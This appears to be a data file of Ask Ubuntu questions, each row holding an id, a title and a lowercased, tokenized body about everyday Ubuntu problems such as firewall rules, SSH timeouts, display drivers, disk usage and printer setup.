111009	why is ufw blocking outgoing connections ?	ufw is blocking some outgoing connections on my server , such as akismet , the spam killing plugin for my wordpress site . according to akismet 's firewall info i need to allow contact with four ips . my ufw rules allow all outgoing traffic . i tried explicitly adding rules both for the ips concerned , but it made no difference . mail on the same server is also blocked when doing a cname lookup . this makes the logs , whereas ufw does n't . apache serves pages fine , and i can get in over ssh , etc in accordance with ufw 's inbound rules . clearly i 've just got ufw set up wrong , as everything works fine when i disable ufw .
111010	how do i remove some sessions from the session list in xubuntu	when logging in to xubuntu , i get a selection list of saved sessions , most of them is outdated old stuff . i hit the delete button in a sportive manner . i tried a click to the left , and just a click to the right - no deletion possible . i went through system menus and menu sections ( and the system section of the menu ) . note : not related : how to remove session entries from lightdm ? or managing the login screen 's sessions list which links to it - they handle session-classes like xubuntu vs. xfce , gnome , kde - not different xfce-sessions . note : i want to remove some sessions , not all of them . i do n't want to start with the session-list deactivated . i have 5 entries and want to remove 3 of them .
111011	how can i install on a dell m1730 laptop ?	i currently have a dell m1730 laptop that with the aquisition of my new system is now surplus , so thought it 'd be good to throw ubuntu on it ( anything is better then the vista currently on it ) . however once i get to the menu to select `` install ubuntu '' and select a language , the screen starts blinking red , green , blue , etc ... . across the whole screen in two second intervals . system boots to windows fine , and it loads the ubuntu cd to the menu screen so it cant ' be hardware related . anyone else ran into such a strange issue , and is it compatible with this laptop ? version is 11.04 , 64bit
111012	installing numpy for python 2.6	how do i install numpy for python2.6 ? when i installed the package python-numpy , it was installed in python2.7 ( the default in ubuntu ) , but not 2.6 .
111013	program for register work time / task	i 'm looking for a program in which i and my small team can register the number of hours it takes to do a certain task . this would be registered daily and if possible would also be free or close to it . thanks vasco
111015	how can i get transparent window borders / titlebars in gnome shell ?	there are plenty of gnome shell themes with transparent panels , and i might want a transparent window border / titlebar theme to go with it . the closest thing i can think of is emerald , but that only works with compiz afaik and gnome shell only works with mutter .
111019	how to make vi default ?	apparently ubuntu 11.10 uses vim when i type vi filename how do i force ubuntu to use vi instead ?
111020	duplicating ubuntu from external hard drive to internal ssd ?	i have been trying to install ubuntu for the last few days and have had no success at installing to my internal ssd . after trying to format it in mac os x and gparted ( which always resulted in a corrupted , unreadable disk ) , attempting to install from usb and cds , and always having it fail at the installation phase , i decided to just install to my external . now that i have a working ubuntu installation on my external , can i just partition my internal and then duplicate the partitions from the external disk ? how would i go about doing this and would it be better to use mac os x or ubuntu ?
111028	`` mountall : event failed '' after a reboot causes system to become unbootable	my server crashed today and upon rebooting gives the following error message and will not boot : mounted-tmp main process ( 700 ) terminated with status 127 mountall : event failed and then hangs . i am able to boot into the recovery console but when trying to select the device for root file system i find it only at : /dev/mapper/ubuntu-root none of the other devices /dev/sda1-6 work . if i use /dev/mapper/ubuntu-root i get a shell and can see my files but ca n't do much else . does anyone know what is causing this ?
111036	why is the shift key suddenly stealing focus ?	so , i 'm using precise beta , and something strange is happening . i understand the alt key behaviour , that 's okay , but it seems that the shift key is doing something similar - that is , it does n't do anything useful , afaics , but it causes the focus to be taken away from the current element while it 's down . mostly this is n't a problem , but in certain cases where focus change triggers an event , it 's a pain . an example problem is in firefox 's firebug , when entering values like 90 % for a css value ; i 'm unable to enter the % symbol , because once shift is down , it loses focus and the 90 disappears . any idea what 's happening ?
111039	how can i configure the touchpad and keyboard settings on a dell inspiron 5110 ?	i am using ubuntu 11.10 . i want the following 3 things : i have dell inspiron 5110 laptop . there is button at the top right corner of laptop which can be used for turning the screen off . it works in windows but it does not work in ubuntu 11.10 . even in the manual of the laptop , it the button is supported only in windows . is there a way to activate it in ubuntu 11.10 ? some of the keys like : `` break '' etc . are missing . can i use other keys ( or combinations of other keys ) to function as those missing keys ? in the program , `` mouse and touchpad '' , there is no tab for touchpad . i want to enable vertical and horizontal scrolling . how do i do that ? the command : xinput list shows virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ power button id=9 [ slave keyboard ( 3 ) ] ↳ sleep button id=10 [ slave keyboard ( 3 ) ] ↳ laptop_integrated_webcam_hd id=11 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] ↳ dell wmi hotkeys please help ! !
111041	where can i find a good finance manager for xubuntu 11.10 ?	i am looking for a finance application that is similar to `` spb finance '' for my pocket pc . that program is simply money tracking with various graphs for a visual account of where your money is going . i do n't need one for business management or anything like that .
111046	installing windows on a seperate hard drive ( after ubuntu 11.10 )	i have an g73jh laptop . recently i dban 'd the whole laptop and installed ubuntu 11.10 ( on my first hdd , leaving the second one unallocated ) . very happy with it , yet still need some stuff from windows . tried to install my win7 to the unallocated hdd , no luck - setup unable to create partition . this is from my gparted ( my ubuntu hdd ) edit - is this something to do with the win not wanting to be installed on disk 1 , but on disk 0 ( where ubuntu now resides ? ) thank you for your time
111051	changed bottom bar in gnome to left , now both bars are gone . can i use terminal to fix this ?	i do n't even know if gnome just crashed or went hidden or what .
111061	accidentally initiated format of ext3 in win 7 , how to recover ?	i have a dual boot , win7 and ubuntu , system and started to format an empty partition on the drive while in win7 , but in my haste thought that i had not started the formatting , reselected the partition ( which turned out to be home ) to format and started again . i realized that the empty partition was being formatted and that my ubuntu home partition was queued to be formatted and canceled it . so my ubuntu home was not formatted but had been changed from ext3 to ntfs . clearly this stupid act buggered up grub , so using live cd , i can see with gparted that the home partition still has it data , but is now inaccessible . can i fix my error ? change back my home from ntfs to ext3 ? can i fix my home partition ? [ hasty is stupidity ] : (
111066	can i remove gnome if ubuntu is my original installation ?	i installed ubuntu with unity and i have also installed kubuntu . i prefer kubuntu and would like to remove unity and all the gnome programmes . i was wondering , since it 's my original desktop environment , would removing it affect me or even be possible ? if it is , i do n't exactly know how so being shown would be great . thanks
111072	can not reinstall ubuntu-desktop in ubuntu 11.10 after messing up with gpg keys	after installing gimp 2.7 from a repository , i lost ubuntu-desktop and gnome shell . now i keep switching xfce , openbox and e17 . but i still miss ubuntu . when i try to install ubuntu-desktop , i get the following error ubuntu-desktop : depends : eog but it is not going to be installed depends : unity-2d but it is not going to be installed recommends : libgail-3-common but it is not going to be installed recommends : libgail-common but it is not going to be installed recommends : totem but it is not going to be installed recommends : totem-mozilla but it is not going to be installed when i try to install gnome shell , i get the following error gnome : depends : gnome-core but it is not going to be installed depends : gnome-games but it is not going to be installed depends : totem-mozilla but it is not going to be installed depends : totem-plugins but it is not going to be installed i actually fixed other keys but this particular one wont get fixed . i want to get back ubuntu-desktop and gnome shell back without formatting . w : gpg error : http : //ppa.launchpad.net oneiric release : the following signatures were invalid : badsig 8ca7a6e8e4fa953a launchpad 0 a.d .
111079	how do i download and install dhcpv6 on my server using ubuntu ?	i 've downloaded dhcp3 on my server and i now need the server to assign ipv6 addresses . also what is stateless autoconfiguration and how do i use it on my server ?
111084	multilingual dictionary for ubuntu with ipa	i am looking for a multilingual dictionary for ubuntu with these features 1 . ipa 2 . english 3 . japanese 4 . korean i have found several but none of them have ipa . os : ubuntu 11.10
111085	how do i hide the grub menu showing up in the beginning of boot ?	i stopped dualbooting and i dont want to have to choose the os anymore and just have it load ubuntu like normal like before ? any help is appreciated .
111086	how can i improve the ssh file transfer performance ?	i have two computers , both on ubuntu 10.10 ( maverick ) . one is an intel e6500 ( 2.93ghz/2gb/2mb cache ) and the other is an e8400 ( 3.0ghz/2gb/6mb cache ) connected via an ethernet cable . both have identical wifi cards and no browser activity nor downloads are in progress when i perform a computer-to-computer file transfer via nautilus copy and paste . i am using ssh server and client . when i copy and paste a 3.2mb file from one computer to the other using nautilus 2.32.0 , it takes about 20 seconds . edit this is a lot slower than expected if the physical layer employed here is the cable . is this normal ?
111092	what is the difference between minimal , desktop & server editions ?	i just want to know , what is the difference between ubuntu minimal , desktop & server editions ? how they differ ? is it by performance ? if yes which one is recommended for a normal user and which one is recommended for a advanced user ?
111096	how to solve : `` connect to host some_hostname port 22 : connection timed out '' ?	i have two ubuntu machines . both have openssh-client and openssh-server installed on them . ssh-ing from machine g ( fresh ubuntu 11.10 installation ) to machine k works great . but ssh-ing from machine k to machine g results always in the error : connect to host some_hostname port 22 : connection timed out i went through the troubleshooting section of help.ubuntu.com and i got the following results : ps -a | grep sshd # results in 848 ? 00:00:00 sshd - sudo ss -lnp | grep sshd # results in 0 128 : ::22 : : : * users : ( ( `` sshd '' ,848,4 ) ) 0 128 *:22 * : * users : ( ( `` sshd '' ,848,3 ) ) - ssh -v localhost # works ! - sudo ufw status verbose # yields : `` status : inactive '' i have n't changed anything in the config file . what can i do to locate the problem and solve it ? i would appreciate any hint ! edit : ping was succesful in both directions ! i did a telnet < machinek > 22 from machine g which resulted in trying and then in telnet : unable to connect to remote host : connection timed out . but telnet the other way around worked just fine ! edit 2 : ssh start/running , process 966 # yields : ssh start/running , process 966 /etc/hostname # contains my hostname , let 's call it blubb /etc/hosts # contains the following 127.0.0.1 localhost # 127.0.1.1 blubb 129.26.68.74 blubb # i added this ! - sudo service ufw status # yields : ufw start/running i installed gufw and set it to on . then i selected from incoming the option allow . then i ssh'ed to another machine from where i ssh'ed back to my machine . still the same error as above : connect to host blubb port 22 : connection timed out any more hints , what i can check ?
111106	software center pdf studio 7 link not working	when i open the software center i see this big banner advertisement for pdf studio 7 . i click it , and i get the error 'not found ' 'there is n't a software package called `` pdfstudio7 '' in your current software sources ' . a google search for that error message gives zero results . a similar question here on ask ubuntu recommends looking for it online as a workaround . the other two ads for 'steel storm ' and 'uplink ' work as expected , bringing me to the details page for each application . is this just a bug report to be filed or am i missing something basic here ? edit : bug report here on launchpad
111116	how can i invoke a user switch from the command line ?	in 11.10 i used 'gdmflexiserver -xnest ' to switch users without logging out however i think gdm has now been completely removed . i 'm trying to bind a keyboard shortcut to do the equivalent of 'me menu > switch user account ... ' . how can i invoke a user switch in 12.04 ?
111118	where is the wallpaper stored ?	on ubuntu 11.10 , i go to a web page , right-click an image and set it as a desktop picture . now my question is i never saved or downloaded it . so where is it stored ?
111122	how does one disable the display of certain users by lightdm ?	in ubuntu 11.10 , the /etc/lightdm/users.conf file states : note : if you have accountsservice installed on your system , then lightdm will use this instead and these settings will be ignored i am trying to remove a single user from the login list . adding a : hidden-users= < user list > line does not work . the users i list still show up . it seems i have the accountservice package installed . so , how do i configure accountservices to not list particular users on the lightdm login screen ?
111124	how to `` ungroup '' windows from an icon on the launcher ?	when i have more than one instance of a program running and i minimize all of them , they are grouped in a single icon on the launcher . for example , i 'm chatting with three people on emesene : joe , mary and paul . then i minimize all three windows and they are grouped in the same emesene icon on the launcher . then , if i want to restore only , i repeat , only joe 's window , i ca n't because if i click on the emesene icon on the launcher , it restores all three windows automatically ( or it shows that animation with all open windows available for me to choose - but this is laggy for me here - probably my computer - so it 's useless ) . i 'd like to know if there 's any way to either `` ungroup '' windows , showing a separate icon for each of them , or have a kind of a `` context menu '' or a quick list , showing a list of all grouped windows so i could choose and click on the one i want only . if i can disable windows grouping , excellent . i think that would be better . if not , i thought of something like this ... right-click on the icon with grouped windows . a menu appears showing all windows available : restore all , joe , mary , paul . i pick what i want from the list and the window ( s ) is ( are ) shown . that 's it . does this exist yet ? if so , please , could you help me find it or do it ?
111144	are terminal and shell the same ?	i know this might sound foolish but i just wanted to know if there is really a difference between the two words used in the linux world . i do know that the shell is a command line interface and has many variants like bash , korn , etc . and i also know that a ctrl+alt+t launches a terminal on ubuntu . i just want to connect these two dots . does it mean the terminal is the window that opens up and the shell is the program that runs behind to interpret the commands typed in the window ? or are they same wherein terminal is a generic term used to abstract the concepts of shell , etc ? what is it that exactly differentiates the two words ?
111150	ca n't upgrade to 11.04 due to partial upgrade	i am trying to upgrade to ubuntu 11.04. when i try i get this popup message from the upgrade manager : not all updates can be installed run a partial upgrade , to install as many updates as possible . this can be caused by : a previous upgrade which did n't complete problems with some of the installed software unofficial software packages not provided by ubuntu normal changes of a pre-release version of ubuntu button : partial upgrade or close when i choose the partial upgrade i get an error message saying : can not upgrade an upgrade from maverick to lucid is not supported with this tool so i cant upgrade . how do i work around this , so that i upgrade ?
111153	ubuntu one wo n't sync certain files , even though they appear in the web interface	the ubuntu one web interface shows me a folder full of files , but on my laptop these files do not appear in the corresponding folder . any new additions to this folder are correctly synced , whether the change is made through the web interface or in the folder directly . but the other files are simply ignored as if they do n't exist . i have tried stopping and restarting the service , and forcing rescanning of folders but ubuntu one just says it is up to date , while these files refuse to be downloaded onto my local machine . any ideas what i can try ?
111156	is it possible to install without the internet ?	i have started installing ubuntu 11.10 on a computer without an internet connection . installation has stopped during configuring target system . the computer seems to be trying to use the internet to grab updates & software . how do i get it to continue to install ?
111158	how to use external displays with intel driver on a nvidia/intel hybrid system	i switched to a new laptop , a dell latitude e6520 . this laptop has a nvidia/intel hybrid gpu setup . when `` nvidia optimus '' is enabled then linux ( ubuntu oneiric ) sees both gpus : lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108 [ quadro nvs 4200m ] ( rev a1 ) when i disable `` nvidia optimus '' then linux only sees the nvidia gpu . everything works fine using the commercial nvidia driver ( only when optimus is disabled ) but i would prefer using the intel gpu instead . i can do this by enabling the `` nvidia optimus '' setting in the bios and by removing the commercial nvidia video driver . the intel driver runs fine even with 3d acceleration . but my problem is : no external displays are detected . here is the output of xrandr : $ sudo xrandr -q screen 0 : minimum 320 x 200 , current 1600 x 900 , maximum 8192 x 8192 lvds1 connected 1600x900+0+0 ( normal left inverted right x axis y axis ) 344mm x 194mm 1600x900 60.0*+ 40.0 1440x900 59.9 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) i tried attaching the display to vga , dvi and hdmi . the output is always the same . the gnome display settings dialog also only sees the internal laptop display . so how can i use external displays with the intel driver ? or are external displays in a nvidia/intel hybrid setup only connected to the nvidia gpu and even windows has to switch to the nvidia gpu when external displays are attached ?
111159	csh \ which $ shell still gives /bin/bash	i need to switch to c-shell and after installing it via software-center it looks like i am ready to go . nevertheless , when i type 'csh ' the line changes to % _ i am still not in a c-shell . when typing which $ shell i get /bin/bash also my program is recognizing i am wrong and gives me error messages . i guess there is a simple solution ? thanks in advance
111160	how do i customise the stylesheet that gvim uses for displaying vala code ?	in the following code examples in gvim , the keywords are shown as bold . how to disable the use of bold and just make them use the same regular font in gvim ?
111162	add 'search wikipedia ' and search 'physics forum ' for right-click-highlight-menu ?	whenever i highlight and right-click some word in firefox in a web page or an ebook , i see an option 'search google' i wanted to add 'search wikipedia ' and search 'physics forum ' option to it , how can i do it ? , thanks in advance
111163	what applications are removed when i upgrade to 12.04 ?	what all will be removed whenever i upgrade from 11.10 to 12.04 ? i 've heard rumors that banshee and tomboy are going to be removed . what else will be removed ? also , are there any major applications that wo n't work whenever i upgrade ? thanks everyone in advance !
111166	what data counters / meters are available ?	actually i have a wireless 3g modem that works well on windows based operating system , its interface software were made windows centric . it can still connect to internet on ubuntu or other linux based operating system but it wo n't show the data counter ( the interface which shows how much data has been transferred , at what speed ) . if i continue to surf internet in linux then i wo n't have any idea how much data has been used and it would become heavy on my pocket . so i just want a software that let me know how much data has been transferred , if there is a limiter ; that warns or disconnects me when i reach predefined mbs then its better . please let me know if there is any software or script or something like that already there .
111171	how to keep top panel only on only one of my dual monitors ?	i am using dual monitors ( equal ) and have recently switched to 11.10 . when i used 10.04 , the top panel with indicators , etc . was showing only on my left monitor , leaving the entire space of the right monitor available for app windows . in 11.10 , the top panel is duplicated on the second monitor . imo , it makes no good , just wastes precious desktop space . is there any way to make the top panel to show only on one monitor ? thanks in advance !
111174	unable to load ubuntu after installing windows	i had ubuntu 11.10 installed , i installed windows 7 on another partition but now on booting i cant see dual boot options and windows 7 is loaded . how can i run ubuntu now ?
111177	triggering driver module rebuild on kernel update	i 'm using hardware that requires a driver to be built which is not present in the kernel source tree , i.e . not `` part of '' linux . currently i 'm finding it necessary to rebuild and install the driver manually every time i start using a new kernel version . is there a way to streamline this process ?
111184	is there a lens with scale effect and workspaces switcher ?	i 'm looking for a lens that show the running windows and the other workspaces . does it exisist ? with this feature unity can be like gnome-shell , i mean `` one key to go '' : i press super and i have all what i need .
111193	suspending a process and resume after a system shutdown/reboot	under ubuntu you can suspend a process by kill -stop [ process id ] and resume by kill -cont [ process id ] but my question is , does this also work after a full system shutdown/reboot ? will the process id be stored on the machine ( and not overwritten by a new process ) ? or are there any other alternatives available ? many thanks in advance , -- stan
111194	how can a bash file run without needing to enter sudo pass-phrase manually ?	i write a bash file thus : # ! /bin/bash echo 1000 |sudo tee /sys/class/backlight/intel_backlight/brightness ( that changes the screen 's brightness ) i need it to run at startup , but because it requires the sudo pass-phrase i must enter the pass-phrase manually . how can i reform this code not to require the sudo pass-phrase at run time ?
111195	problem installing ubuntu 11.10 on new laptop	i bought a toshiba sattellite l755d-12f two days ago with windows 7 . i wanted to install ubuntu 11.10 , but whenever i boot it from a live cd or usb i get a blank screen . now i 've seen similar topics around the internet , but i ca n't get wiser out of it . ( something about pressing f6 and nomodeset . ) does someone know a link to a good tutorial , or is it possible to prepare my amd driver for linux within windows ?
111197	how to update package manager to get package available in 12.04 on 11.10 ?	i 'm using ubuntu 11.10 , which has libmongodb-perl 0.39-1 available through apt-get . i see that version 0.45 is availble in the `` precise '' ( 12.04 ) universe . how can i update apt to install version 0.45 of this driver ?
111208	audio keeps stuttering during audio/playback	i 'm using a hp probook 6550b with lubuntu on it . i 've used various *buntus on this notebook with no sound issues . i do n't know where the problem comes from . i 'm playing a mp3 , a video from the harddisk or youtube and from time to time i get this annoying stuttering that totally ruins it .
111212	how do i add icons to change view type in nautilus ?	is there a way to add , in the nautilus tool-bar , or in the bottom of the window , icons to change visualisation mode ? icons , list , detail..
111213	understanding disk usage	my ubuntu server is installed on hard drive with very simple partitioning /dev/sdd1 * 1 1824 14647296 83 linux /dev/sdd2 1824 3283 11718656 83 linux /dev/sdd3 3283 4864 12702720 82 linux swap / solaris so about 14gb is allocated for / and about 12gb for /home . the rest is swap . today i noticed when i login i got a warning that running out of space . df shows the following filesystem size used avail use % mounted on /dev/sdd1 14g 13g 619m 96 % / none 2.9g 260k 2.9g 1 % /dev none 2.9g 0 2.9g 0 % /dev/shm none 2.9g 852k 2.9g 1 % /var/run none 2.9g 0 2.9g 0 % /var/lock none 2.9g 0 2.9g 0 % /lib/init/rw /dev/sdd2 12g 2.6g 8.0g 25 % /home at this point i am trying to understand what eats 13g on my root partition . du shows the following output $ sudo du -hxl -- exclude= '' /home '' -- max-depth=1 / # excluding home because it 's other partition 0 /sys 4.0k /selinux 4.0k /mnt 447m /lib 4.0k /opt 1.9g /usr 64m /etc 447m /lib64 31m /boot 8.2m /sbin 8.0k /man 48k /root 358m /var 0 /proc 0 /dev 4.0k /srv 16k /lost+found 28k /tmp 12m /bin 3.2g / parted disk /dev/sdd : 40.0gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 15.0gb 15.0gb primary ext4 boot 2 15.0gb 27.0gb 12.0gb primary ext4 3 27.0gb 40.0gb 13.0gb primary linux-swap ( v1 ) the sum is far not 13g , in fact it 's around 5g . so what exactly takes space on my root partition ?
111216	ubuntu configuring printers	i having issues connecting to my brother printer ( dcp 7030 ) using ubuntu 11.10 . there are no drivers available for the same in ubuntu , as its one of the latest printers available in market . unfortunately the installation cd 's coming with the printer are for windows and mac . like to know , where can i get the drivers for the same . any assistance , is highly appreciated .
111224	how do i reput the gnome sound that sounds at the beginnig ?	when i installed the operating sistem , there was an option for this sound , but in that time i did n't want the sound be played . now i want it , then how do i put it again ? help
111229	how to prevent gnome-sound applet from automatically reducing mic volume ?	it happens all the time , when i 'm talking to someone on skype or google voice and video , the mic volume automatically keeps going down , as if it is trying to auto-adjust it . i want to disable this feature , because it takes the volume down to inaudible levels .
111230	access a virtual host on a server in virtualbox directly	the server : ubuntu 10.10 server as guest in a virtualbox ( ip 192.168.178.91 ) . simple question : i want to access a virtual host named 'example.server ' from outside my virtual box by simply using a browser and an address like http : //example.server . the whole thing should be realized by using dnsmasq . thx . : )
111233	java could not reserve enough memory to start the server	how do i fix this error ? java could not reserve enough memory to start the server hope you guys can help me .
111236	how to migrate the whole system to a new machine ?	i use ubuntu to deal with daily job . now i buy a new laptop , and i want to migrate my whole system ( programs , packages , data , settings , etc ) to the new machine . i know i can copy my home folder to new machine and i will get ( almost ) all data and settings . but is there a safe way to copy the whole system ? or it 's a bad idea ?
111240	challenges after installation	just installed windows xp on a clean laptop , then installed ubuntu as a dual boot . it said installation was complete , then when i restart , all i get is this a blank screen with this on it ... ending in a prompt . please help . fsck from util-linux 2.19.1 /dev/sda5 : clean , 140746/188416 files , 733804/752640 blocks initctl : event failed skipping profile in /etc/apparmor/d/disable : usr.bin/firefox * starting apparmor profiles [ ok ] speech-dispatcher disabled ; edit /etc/default/speech-dispatcher checking for running unattended-upgrades : * starting bluetooth [ ok ] *pulseaudio configured per-user sessions saned disabled ; edit /etc/default/saned [ ok ]
111243	using dell 's wwan 5520 gps	i have a dell d430 laptop , with dell 's wwan 5520 chip in minipcie port on ubuntu 12.04 the 3g part of it works fine , but when it comes to using the gps module , i 'm clueless how to even begin . i installed viking , with its dependencies , but i do n't know if i need to load some module for the gps part , whats the interface that i should use with viking , and pretty much anything else that i should know . i think the card is actually a usb module , bridged via pcie , it 's also based on novatel eu870d chip . lsusb returns : bus 001 device 006 : id 413c:8137 dell computer corp. wireless 5520 voda l mobile broadband ( 3g hsdpa ) minicard status port
111250	displex indicator not working in ubuntu 11.10	i have installed displex 0.7.2 from source forge . but i am not getting any indicator when i run indicator-displex instead i get the following error spv @ matrix : ( ~ ) $ indicator-displex ( indicator_displex.py:5120 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( indicator_displex.py:5120 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( indicator_displex.py:5120 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( indicator_displex.py:5120 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , a saved configuration file was found . its contents are : { 'metacity_start_cmd ' : 'metacity -- replace & ' , 'intel_gma_aiglx ' : false , 'ignore_desktop_hints ' : true , 'sm_disable ' : true , 'displex_menu_sccsm ' : true , 'displex_onstart_restart_compiz ' : false , 'loose_binding ' : false , 'compiz_start_cmd ' : 'compiz -- replace -- sm-disable -- ignore-desktop-hints ccp & ' , 'indirect_rendering ' : false , 'displex_menu_compiz_opts ' : true , 'fast_filter ' : false , 'no_fbo ' : false , 'displex_version ' : '.71 ' , 'displex_verbose ' : false , 'displex_menu_ccsm ' : true } versions are the same . using saved settings . settings restored from configuration file : { 'metacity_start_cmd ' : 'metacity -- replace & ' , 'intel_gma_aiglx ' : false , 'ignore_desktop_hints ' : true , 'sm_disable ' : true , 'displex_menu_sccsm ' : true , 'displex_onstart_restart_compiz ' : false , 'loose_binding ' : false , 'compiz_start_cmd ' : 'compiz -- replace -- sm-disable -- ignore-desktop-hints ccp & ' , 'indirect_rendering ' : false , 'displex_menu_compiz_opts ' : true , 'fast_filter ' : false , 'no_fbo ' : false , 'displex_version ' : '.71 ' , 'displex_verbose ' : false , 'displex_menu_ccsm ' : true } -- -- -- -- -- -- ************************************************************ ==================================== displex system information -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- compiz effects installed : true compiz 0.9.6 compiz ccsm installed : true compiz simple ccsm installed : false emerald decorations installed : false gtk window decorations : true disper installed : false acerhk gui installed : false ==================================== ************************************************************ ** compiz -- replace -- sm-disable -- ignore-desktop-hints ccp & ** traceback ( most recent call last ) : file `` /usr/share/indicator-displex/indicator_displex.py '' , line 1581 , in < module > control = indicatordispex ( ) file `` /usr/share/indicator-displex/indicator_displex.py '' , line 220 , in __init__ self.set_menu ( ) file `` /usr/share/indicator-displex/indicator_displex.py '' , line 1071 , in set_menu desktop_state = self.gconf.get_value ( '/apps/nautilus/preferences/show_desktop ' ) # get current value from gconf valueerror : gconf key /apps/nautilus/preferences/show_desktop has no value please tell me what to do to get the indicator .
111251	mozilla firefox /importing files from browsers	i downloaded mozilla firefox , and i made it my default browser ; how do i import all my stuff i had on internet explorer ?
111253	ubuntu configuring brother laser printer	i having issues connecting to my brother printer ( dcp 7030 ) using ubuntu 11.10 . there are no drivers available for the same in ubuntu , as its one of the latest printers available in market . unfortunately the installation cd 's coming with the printer are for windows and mac . like to know , where can i get the drivers for the same . any assistance , is highly appreciated .
111256	how can i make unity always show filter results ?	i want filter results in unity to always show . how is that possible ? i use ubuntu 12.04 . see the screenshot :
111259	how to activate opacify compiz plugin	i want use compiz plugin feature called `` opacify '' . in ubuntu 10.10 , this feature fine work , but since ubuntu use unity as default in 11.04 , opacify not work . how to use this feature in 12.04 ? then , how to make a smooth scrolling in dash unity 3d like the unity 2d
111260	why ca n't i use an openssl key pair with ecryptfs ?	according to documentation , i simply create a public/private keypair for ecryptfs using ecryptfs-manager . but there is nothing to select . $ sudo ecryptfs-manager ecryptfs key management menu -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 1 . add passphrase key to keyring 2 . add public key to keyring 3 . generate new public/private keypair 4 . exit make selection : 3 select key type to use for newly created files : selection : there should at least one option for me to select , sorta like this : make selection : 3 select key type to use for newly created files : 1 . openssl 2 . probably some other option here selection : i am using ubuntu 11.10 ( with xubuntu-desktop ) . i have all relevant packages afaik like ecryptfs-utils , openssl , keyutils . what am i missing ? although i can create a key pair using openssl like so ( i am not sure this is right for use with ecryptfs ) : $ openssl genrsa -out rsakey.pem -aes256 2048 generating rsa private key , 2048 bit long modulus ( ... ) enter pass phrase for rs-efs-rsakey.pem : verifying - enter pass phrase for rs-efs-rsakey.pem : $ openssl rsa -in rsakey.pem -out rsapub.pem -pubout enter pass phrase for rsakey.pem : writing rsa key there is still a problem with ecryptfs because just like ecryptfs-manager , mount -t ecryptfs also misses the option to choose for keys . when i mount something random , i get : $ sudo mount -t ecryptfs ~/temp ~/temp [ sudo ] password for redsandro : passphrase : it immediately assumes i want to use password encryption . what i should have gotten is something like this : $ sudo mount -t ecryptfs ~/temp ~/temp [ sudo ] password for redsandro : select key type to use for newly created files : 1 ) openssl 2 ) passphrase 3 ) tspi selection : i am guessing the same [ something ] is missing for ecryptfs-manager and mount , because the same question is present in documentation . what am i missing ?
111262	2 driver available via jockey	i installed my nvidia proprietary driver . but i have another that remains uninstalled . and i do n't know whether i have to install that to or no . cause the description isnt that different from the driver i installed here is what i mean ( its in dutch sorry ) install the second one post-release update ? , or no
111263	how can i reset the terminal colors ?	i was messing around with my terminal colors , and did n't realize i was modifying the default profile . now i want it back how it was . how can i reset the profile ?
111273	gimp 2.7.5 crashed theme and applications	i am using ubuntu 11.10 . i was using gimp 2.6 from the repo but i read that gimp 2.7 has merged windows , i wish i had n't but i wondered it and added the following ppa : matthaeus123/mrw-gimp-svn after that it required me to add two other repos : gimp 2.7.5 will not work with the current glib and gtk in oneiric . to fix the problem install these repos deb http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu oneiric main deb http : //ppa.launchpad.net/ricotz/testing/ubuntu oneiric main i added those ppas and in somewhere a pop-up with `` partial-update '' appeared i applied the update and restarted ubuntu . after the restart , my theme was a little bit changed , when i right-click the color is not gray but white and most importantly i am not able to reach : software sources , when clicked it looks as if opening and then closes . sudo gedit /etc/apt/sources.list does n't work , because my gedit does n't work . preferences in nautilus , when clicked it closes nautilus . i would like to revert everything i updated . i would like to downgrade/remove the packages ppa : gnome3-team/gnome3 and ppa : ricotz/testing ppas but i am unable to do it . so , i am stuck . how do i restore everything ?
111276	external full hd monitor and virtual desktop size	i have two fullhd monitors attached to my ati graphics card [ 2 ] . the resolution of both of them is detected properly without any modifications to /etc/x11/xorg.conf . i can run both of them in clone mode . however , when i try to run them next to each other , i got the following error : the selected configuration for displays could not be applied . if tried to fix this according to [ 1 ] . my xorg.conf now looks like this : section `` module '' load `` glx '' endsection section `` screen '' identifier `` default screen '' defaultdepth 24 subsection `` display '' # the 1088 is the smallest multiple of 32 > = 1088 # see manpages virtual 1920 1088 endsubsection endsection this does not seem to be parsed properly . after restarting x , i can not set resolutions beyond 1600 or so any more . /var/log/xorg.0.log gives : [ 15.676 ] ( ii ) fglrx ( 0 ) : not using mode `` 1920x1080 '' ( width too large for virtual size ) [ 15.676 ] ( ii ) fglrx ( 0 ) : not using mode `` 1680x1050 '' ( width too large for virtual size ) are my modifications syntactically incorrect ? according to the man page , it should be fine . any ideas ? os : ubuntu 11.10 64bit [ 1 ] http : //askubuntu.com/a/75546/5023 [ 2 ] 01:00.0 vga compatible controller : ati technologies inc juniper [ radeon hd 5700 series ]
111278	what does the term `` juju trunk '' mean	in the juju documentation on writting a charm , link a prerequisite is being in the `` juju trunk . '' is this a specified location in my system after having installed the juju packages , or is this a environment i create myself . also , what other prerequisites do i need to be aware of when i attempt to build a juju charm ?
